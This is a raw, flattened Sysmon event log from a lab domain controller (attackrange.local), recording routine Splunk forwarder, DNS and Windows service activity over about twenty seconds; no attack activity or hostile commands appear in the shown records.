10341000x80000000000000002202918Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202917Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202916Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202915Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202914Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E95B-6040-394E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202913Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.486{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E95B-6040-394E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202912Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.487{5ABCFE62-E95B-6040-394E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202911Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.345{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39BE2072E55FDFFB22DE5B4EBAE63782,SHA256=B2488361C805EDC0FDAA5292C3706A483333A924C532D0B39965483041681EC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202910Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.064{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6211D35305FBA622F8E964F13A8A69,SHA256=9CE15B90E4BB5D10D7B8097E569340F7B9FD4934561967ED37FD5DE5BE130782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202922Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:20.502{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=971B56A9264863FDF614943735D16560,SHA256=13F664EC14C9F49CE703055DC645DC715E9EBF9204B777374BDE5040D266DD4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202921Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:20.064{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6EE213B7E6F6BF539DDFAA29A08859E,SHA256=4D301BB8B79356DF14858FBB332CD9D0D83850892216E073D7EFD21648805DF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202923Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:21.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5238DDE2267D316ECF9115E2FFC9B2C4,SHA256=5E4EA3254CA60EE046FDAC35F0FE454962E6C7BCEC45656291A4A8F9C05BC8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202926Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:22.830{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFAE6BDE267E647525164F87DE18B720,SHA256=7B60FE3664CA7449E8AC63336F733FC0BDCA666782839C1B81A6A35DA66BB8B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202925Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:22.236{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=83BACBDD1BE932B43A23F0419FDA15F4,SHA256=69A2BB74F998C06D780028240F9CF526A66F063E6CFDAF4F8AF903B3D34A0D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202924Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:22.095{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F686E27A56B62A0661C3D266D52E76,SHA256=63B3BABE25E232ED352F8E240F4D7A53E1ABE07E1C238C8189D64BB82164824D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202929Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:20.072{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60680-false10.0.1.12-8000- 23542300x80000000000000002202928Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:23.111{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=801BD711530C16C58CC852D4CCE7F02D,SHA256=2BD7C03FB03C0EAFE0AC478AB3F6E7BCFE1DC71BA23B12F78C2D08ABD8883A67,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202927Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:19.463{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55802- 354300x80000000000000002202931Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:20.462{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55802- 23542300x80000000000000002202930Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:24.124{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F9CB06BDDF2C5356D106B7F3D01C934,SHA256=9C31D7048FCFD4A6DE395E8B1388926D667D8183C70D3E56E4B372F10B92B824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202932Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:25.139{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D7D502AD4266FD3662904C2D6CCCDBE,SHA256=3835B7FEFF9EFF63A22D0C018E8A79877407C64295FF34464A764DD733A105C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202933Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:26.143{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA07BF52DDD625B7CC76CA9EB5E8ECCD,SHA256=A1F78265BE453AEBAD3B93F7046139C6018DA98D63F129DC8D372605E9FF7906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202934Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:27.158{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BA2DCBEC51FDCEC3E65D7FD2CAC3A62,SHA256=B0214DD642FABE6D79A4704A40032EC5F585F2EE0C3A0A7E7E1F12B673E60847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202935Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:28.174{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=067E897229F04A6D3F719F4ED76A291A,SHA256=4C74B250982CA6ED6714B4E4E0365CB4F2EA882BD1BB52FEAD0E4A79984FFB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202938Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:29.174{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778420C45097304D4425321E673F70EA,SHA256=429B1256139B703F050D9ECC7F48264DCBE4704B6BB5E001A01FFC1704F6694D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202937Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:29.111{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62F2AB39234746B2CB0E26DD5FA81C15,SHA256=C3C904FE6C7F05AB447E7688397D0093ECABE6561D50EFE7BB72CA3098817EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202936Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:29.111{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F3A3B8F9ED97D75E24729A5C66EEB70,SHA256=B2238F5B6136B5F756F340FD9C44C52682AC52E5E86AAD7DE7596449E2E4AF35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202941Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:30.471{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62F2AB39234746B2CB0E26DD5FA81C15,SHA256=C3C904FE6C7F05AB447E7688397D0093ECABE6561D50EFE7BB72CA3098817EBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202940Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:30.189{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF8FE68405BEA44B94B75CDF5B19A15,SHA256=8D8C04AE305C71C46898B4E1986512D7E7A3E7744B63715CD7E71879B485760D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202939Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:25.932{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60681-false10.0.1.12-8000- 23542300x80000000000000002202942Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:31.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5795DDA2FAEAFCA46FC2EF45092388CC,SHA256=D9C09C513AB8AEE69C4385F24BA346CF6D07A45272A8BC8842CFFDEB71599049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202944Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:32.643{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACC79E36E5D18D54E6C1F895C8865D3F,SHA256=993139E47DF5222359737E1F8F62FBDD5BF3FF15A0C726724EBD83C824A8B198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202943Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:32.205{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E3DAD5C6443D0999BCE40F58565B586,SHA256=CED416BB344D4EBA32841218E22B91E7D850C59C253FC284BE5936735F2B610F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202946Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:33.643{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7717E43359BE28D42997B6FE0BBB438,SHA256=D22655A5BEC82D0B84FEB4BE2E9005F7FCBA076394793AA833BEB238961EBE8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202945Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:33.221{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=681537E904ADD145DCF603400FD23FE2,SHA256=EEEC1C2A11037F07A25FE82D9FF526B3D589ADD649D9FC74AAD24F6F672CBFE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202949Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:30.478{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62293- 354300x80000000000000002202948Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:29.463{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62293- 23542300x80000000000000002202947Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:34.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59F5CDE6C47F0E3285B02514E8D18398,SHA256=337DB27207145CCAC5B254158F5DDDA7C3852DC081BB431622CDFC5B2557FC0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202951Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:30.994{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60682-false10.0.1.12-8000- 23542300x80000000000000002202950Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:35.252{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25097D9E23DFD37F6F112DCEE74F7660,SHA256=41869F8226A557369709359BF10174016771E69DA3713797EEF795088C483114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202953Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:36.721{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFB9588968AB7B64031FBAB2B05E61A9,SHA256=823E45BEDCFD19E4A2DFC3ECDD6F556EC307CEE46ADB53D42748C7D3E82AE4FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202952Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:36.268{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5451D93EC1B3D7FC1B8271AC0E00637,SHA256=8F2B3E2CA4B8B9AED576A5B8B258454389E0BC775E982EA692CEE0416504A29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202954Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:37.268{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99E32572BC7834BC0CD746BFCB57B064,SHA256=056B7BACFD76FA9201FCDB0EE06D72AB1D368471DB32CB442B9F6805B521DD31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202955Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:38.268{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4FBED4B82766A87176699CC087DE983,SHA256=6D7CEE26B361FCD83066C1823687154400C41EDCDD4B42039589DF0DBB1CB0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202957Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:39.283{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC823CC20B140E9428D2D665E927C97E,SHA256=AA8EE5D3C1CE0C0D2A3EE895AEAFA3BFB93606025D4E0651412DCACD8A889BE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202956Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:39.283{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD49C1F5F22A7A7E43959AA9C8E8DB3,SHA256=91B2A870B4911BD6119F1308367228F332A6B0EDA13A49DBB5271E165C456F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202960Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:06:40.768{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 